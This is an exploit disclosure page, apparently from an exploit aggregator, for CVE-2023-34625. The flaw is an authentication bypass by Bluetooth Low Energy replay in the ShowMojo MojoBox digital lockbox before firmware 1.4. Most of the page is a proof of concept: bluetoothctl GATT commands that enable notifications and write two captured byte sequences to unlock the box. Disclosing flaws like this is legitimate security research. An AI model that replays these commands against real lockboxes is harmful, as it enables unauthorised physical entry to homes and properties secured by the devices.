Share
## https://sploitus.com/exploit?id=PACKETSTORM:173604
# Exploit Title: MojoBox v1.4 BLE replay attack
# Exploit Author: Matteo Mandolini
# Date : 15/03/2023
# Vendor Homepage: https://hello.showmojo.com/mojobox/
# Version: <1.4
# CVE: CVE-2023-34625
BLE Replay attack
ShowMojo MojoBox Digital Lockbox with firmware versione prior to 1.4 is vulnerable to authentication bypass. The implementation of the lock
opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks.
PoC:
[MojoBox-023516]# gatt.select-attribute ff02
[MojoBox-023516:/service000c/char000f]# gatt.notify on
[CHG] Attribute /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000f Notifying: yes
Notify started
[MojoBox-023516:/service000c/char000d]# gatt.write "0x68 0x01 0x18 0x28 0xFC 0x08 0xE5 0xB9 0xDA 0xDB 0xCE 0x21 0x62 0x1B 0x2A 0xF9 0xBE 0xFB 0x1E 0xE9"
Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d
[MojoBox-023516:/service000c/char000d]# gatt.write "0xA0 0x13 0xEE 0x11 0x94 0x31 0x7D 0xDB 0x16"
Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d